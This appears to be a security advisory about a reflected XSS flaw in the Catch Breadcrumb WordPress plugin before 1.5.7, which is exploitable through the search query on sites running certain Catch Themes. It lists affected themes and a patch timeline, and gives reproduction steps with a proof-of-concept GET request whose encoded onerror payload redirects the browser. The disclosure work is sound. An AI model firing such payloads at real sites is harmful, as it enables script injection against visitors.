Catch Breadcrumb < 1.5.7 - Unauthenticated Reflected XSS

=== [ DESCRIPTION - REFLECTED XSS ] ======================================== # Catch Breadcrumb 1.5.4 plugin for WordPress allow Reflected XSS via a search query when used with one of the theme from the same author: Alchemist & Alchemist PRO, Izabel & Izabel PRO, Chique & Chique PRO, Clean Enterprise & Clean Enterprise PRO, Bold Photography PRO, Intuitive PRO, Devotepress PRO, Clean Blocks PRO, Foodoholic PRO, Catch Mag PRO, Catch Wedding PRO, Higher Education PRO. === [ AFFECTED CATCH THEMES ] ============================================== # 00 - ALCHEMIST & ALCHEMIST PRO [ https://catchthemes.com/demo/alchemist/ ] # 01 - IZABEL & IZABEL PRO [ https://catchthemes.com/demo/izabel/ ] # 02 - CHIQUE & CHIQUE PRO [ https://catchthemes.com/demo/chique/ ] # 03 - CLEAN ENTERPRISE & CLEAN ENTERPRISE PRO [ https://catchthemes.com/demo/clean-enterprise/ ] # 04 - BOLD PHOTOGRAPHY PRO [ https://catchthemes.com/demo/bold-photography/ ] # 05 - INTUITIVE PRO [ https://catchthemes.com/demo/intuitive/ ] # 06 - DEVOTEPRESS PRO [ https://catchthemes.com/demo/devotepress/ ] # 07 - CLEAN BLOCKS PRO [ https://catchthemes.com/demo/clean-blocks/ ] # 08 - FOODOHOLIC PRO [ https://catchthemes.com/demo/foodoholic/ ] # 09 - CATCH MAG PRO [ https://catchthemes.com/demo/catch-mag/ ] # 10 - CATCH WEDDING PRO [ https://catchthemes.com/themes/catch-wedding-pro/ ] # 11 - HIGHER EDUCATION PRO [ https://catchthemes.com/themes/higher-education-pro/ ] Edit (WPScanTeam): April 22nd, 2020 - Escalated to WP Plugins Team. Plugin Closed April 23rd to 25th, 2020 - Various versions released, to add validation and sanitisation

PoC

=== [ STEPS TO REPRODUCE ] ================================================= # 00 - Install & activate any of the affected themes; # 01 - Download the Catch Breadcrumb plugin from https://downloads.wordpress.org/plugin/catch-breadcrumb.zip or install it directly from WordPress admin dashboard; # 02 - Activate the plugin; # 03 - Go to the website; # 04 - Use your XSS payload in a search query, f.e.: /?s= === [ PROOF-OF-CONCEPT ] =================================================== GET /?s=%3Cimg+src%3Dx+onerror%3Dwindow.location%3D%60https%3A%2F%2Fprofiles.wordpress.org%2Fexmi%2F%60%3B%3E HTTP/1.1 Host: target.com Note: If the payload is not triggered (can happen if the plugin has been installed before the theme for example), then go to the plugin settings (/wp-admin/admin.php?page=catch-breadcrumb) and click on the ‘Save Changes’ button.